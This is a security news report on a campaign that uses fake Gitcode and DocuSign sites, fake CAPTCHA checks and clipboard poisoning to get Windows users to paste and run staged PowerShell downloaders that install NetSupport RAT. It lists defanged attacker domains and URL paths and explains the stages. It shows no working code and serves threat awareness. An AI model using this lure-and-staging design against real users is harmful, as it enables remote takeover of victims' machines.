Article Details

Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack. Threat hunters are alerting to a new campaign that employs deceptive websites to trick unsuspecting users into executing malicious PowerShell scripts on their machines and infect them with the NetSupport RAT malware. The DomainTools Investigations (DTI) team said it identified "malicious multi-stage downloader Powershell scripts" hosted on lure websites that masquerade as Gitcode and DocuSign. "These sites attempt to deceive users into copying and running an initial PowerShell script on their Windows Run command," the company said in a technical report shared with The Hacker News. "Upon doing so, the powershell script downloads another downloader script and executes on the system, which in turn retrieves additional payloads and executes them eventually installing NetSupport RAT on the infected machines." It's believed that these counterfeit sites may be propagated via social engineering attempts over email and/or social media platforms. The PowerShell scripts present hosted on the fake Gitcode sites are designed to download a series of intermediate PowerShell scripts from an external server ("tradingviewtool[.]com") that are used in succession to launch NetSupport RAT on victim machines. DomainTools said it also identified several websites spoofing Docusign (e.g., docusign.sa[.]com) to deliver the same remote access trojan but with a twist: Using ClickFix-style CAPTCHA verifications to dupe victims into running the malicious PowerShell script. Like the recently documented attack chains delivering the EDDIESTEALER infostealer, users who land on the pages are asked to prove they are not a robot by completing the check. Triggering the CAPTCHA verification causes an obfuscated PowerShell command to be clandestinely copied to the user's clipboard -- a technique called clipboard poisoning -- after which they are instructed to launch the Windows Run dialog ("Win + R"), paste ("CTRL + V"), and press Enter, causing the script to be executed in the process. The PowerShell script works by downloading a persistence script ("wbdims.exe") from GitHub to ensure that the payload is launched automatically when the user logs in to the system. "While this payload was no longer available during the time of investigation, the expectation is that it checks in with the delivery site via 'docusign.sa[.]com/verification/c.php,'" DomainTools said. "Upon doing so, it triggers a refresh in the browser for the page to display the content of 'docusign.sa[.]com/verification/s.php?an=1.'" This results in the delivery of a second-stage PowerShell script, which then downloads and executes a third-stage ZIP payload from the same server by setting the URL parameter "an" to "2." The script proceeds to unpack the archive and run an executable named "jp2launcher.exe" present within it, ultimately leading to the deployment of NetSupport RAT. "The multiple stages of scripts downloading and running scripts that download and run yet more scripts is likely an attempt to evade detection and be more resilient to security investigations and takedowns," the company said. It's currently not clear who is behind the campaign, but DomainTools pointed out that it identified similar delivery URL, domain naming, and registration patterns in connection with a SocGholish (aka FakeUpdates) campaign detected in October 2024. "Notably, the techniques involved are commonplace and NetSupport Manager is a legitimate administration tool known to be leveraged as a RAT by multiple threat groups such as FIN7, Scarlet Goldfinch, Storm-0408, and others."